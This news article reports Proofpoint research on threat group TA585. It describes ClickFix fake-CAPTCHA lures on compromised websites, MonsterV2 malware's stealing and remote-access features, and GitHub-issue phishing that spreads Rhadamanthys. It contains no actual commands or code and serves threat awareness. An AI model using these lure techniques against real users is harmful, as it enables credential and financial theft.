An emerging threat group is leveraging compromised websites and GitHub issues to launch
ClickFix attacks spreading MonsterV2 and other malware, Proofpoint reported in a
new research blog Monday.
The threat actor, tracked as TA585, was noted to own its own infrastructure and operate across the entire attack chain without relying on third parties, except for malware-as-a-service (MaaS) providers.
The main malware payload used by TA585 is MonsterV2, a backdoor, stealer and loader MaaS. TA585 has also been known to use
Lumma Stealer and
Rhadamanthys.
ClickFix attacks abuse compromised websites
TA585 was first spotted in April 2025, using web injects into compromised legitimate websites to serve ClickFix lures.
The malicious injected JavaScript displays an overlay on top of the original site content, showing a fake CAPTCHA and instructing the user to copy and paste PowerShell commands to “complete the verification steps.”
TA585 uses its own filters and antibot checks rather than relying on third-party traffic distribution systems (TDS), Proofpoint said. The PowerShell command downloads the malware payload from an attacker-controlled domain while the injected script controls the redirect flow to ensure the victim cannot proceed to the legitimate web page content until the malware is communicating with the attacker’s domain from the same IP address.
The attacks originally delivered Lumma Stealer, but began spreading MonsterV2 in May 2025; the Rhadamanthys infostealer has also been observed in these attacks.
MonsterV2: a multi-functional MaaS
MonsterV2 has remote access trojan (RAT) capabilities in addition to infostealer features and the ability to load additional payloads.
The malware can be used to exfiltrate browser and login data, credit card and crypto wallet information, Steam, Telegram and Discord tokens and files, among other data. It also has the ability to capture the victim’s desktop and webcam and replace crypto addresses found in the clipboard with attacker-provided addresses.
MonsterV2 uses hidden virtual network computing (HVNC) to establish remote desktop access without the victim’s awareness and supports a wide variety of commands received from the attacker’s command-and-control (C2) server.
The malware’s creators advertise it on cybercrime forums, offering a “standard” version for about $800 a month and an “enterprise” version with expanded features for $2000 a month. Proofpoint noted that MonsterV2 is often packed using another MaaS called SonicCrypt to help prevent analysis and detection.
GitHub issues abused in Rhadamanthys campaign
In addition to web injections, TA585 has also been observed
abusing GitHub issues and email notifications to spread the Rhadamanthys infostealer.
In these attacks, TA585 tags its targets in a GitHub issue that is written to appear like a security warning email from GitHub itself. The tagged victims receive the text of the issue in an email notice from a legitimate GitHub address through the site’s notifications system and may mistake the fake security warning as a legitimate alert from GitHub.
A link included in the fake alert directs users to an attacker-controlled website that uses the same ClickFix fake CAPTCHA technique as TA585’s other attacks and ultimately spreads the Rhadamanthys infostealer. TA585 has been using the GitHub phishing technique since at least August 2025, according to Proofpoint.
The rise of TA585 and spread of MonsterV2 through ClickFix lures emphasizes the importance of ClickFix awareness training and the prevention of PowerShell execution for non-administrative users, Proofpoint concluded.
